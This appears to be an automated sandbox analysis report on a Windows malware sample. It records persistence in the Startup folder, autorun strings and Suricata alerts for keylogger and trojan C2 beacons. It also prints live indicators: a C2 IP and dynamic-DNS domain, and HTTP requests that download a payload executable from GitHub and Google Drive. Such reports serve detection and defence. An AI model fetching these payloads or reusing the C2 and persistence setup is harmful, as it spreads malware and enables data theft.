                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49820 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49831 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49874 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49875 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49885 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49886 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49890 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49891 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49908 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49931 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49932 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49944 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49977 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:49980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50016 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50014 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50049 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50050 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50072 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50073 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50095 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50096 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50112 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50111 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50127 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50130 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50139 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50140 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50143 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50145 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50147 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50155 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50162 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50168 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50170 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50172 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50174 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50183 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50184 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:50185 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50186 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50192 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50194 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50204 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50203 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50208 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50209 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50220 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50222 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50224 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.7:50226 version: TLS 1.2
                                Source: wscript.exe, 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: wscript.exe, 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: wscript.exe, 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: update.exe, 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: update.exe, 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: update.exe, 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: ~$cache1.16.drBinary or memory string: [autorun]
                                Source: ~$cache1.16.drBinary or memory string: [autorun]
                                Source: ~$cache1.16.drBinary or memory string: autorun.inf
                                Source: RCXD42.tmp.14.drBinary or memory string: [autorun]
                                Source: RCXD42.tmp.14.drBinary or memory string: [autorun]
                                Source: RCXD42.tmp.14.drBinary or memory string: autorun.inf
                                Source: update.exe.0.drBinary or memory string: [autorun]
                                Source: update.exe.0.drBinary or memory string: [autorun]
                                Source: update.exe.0.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,15_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,15_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,15_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FD47 FindFirstFileW,FindClose,15_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_0016FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D2044
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D219F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008D24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_008C6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_008C6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008CF350
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089DD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_0089DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_008CFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFD47 FindFirstFileW,FindClose,22_2_008CFD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,31_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,31_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FD47 FindFirstFileW,FindClose,31_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,31_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,31_2_0016FDD2
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: excel.exeMemory has grown: Private usage: 5MB later: 73MB

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:49840 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49840 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.7:49828 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49940 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50046 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50126 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:50159 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50159 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50201 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50229 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:50240 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50240 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50242 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50241 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50237 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49842 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49820 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49830 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49874 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49821 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49908 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49858 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49918 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49891 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49931 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49886 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49897 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49875 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49941 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49932 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49899 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49919 -> 142.250.185.78:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49907 -> 142.250.185.78:443
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443Jump to behavior
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Potential malicious VBS script found (has network functionality)
                                Source: Initial file: .write kpUGCvRO.responseBody
                                Source: Initial file: .savetofile FileName , 2
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/JPS.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,15_2_0017550C
                                Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/JPS.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
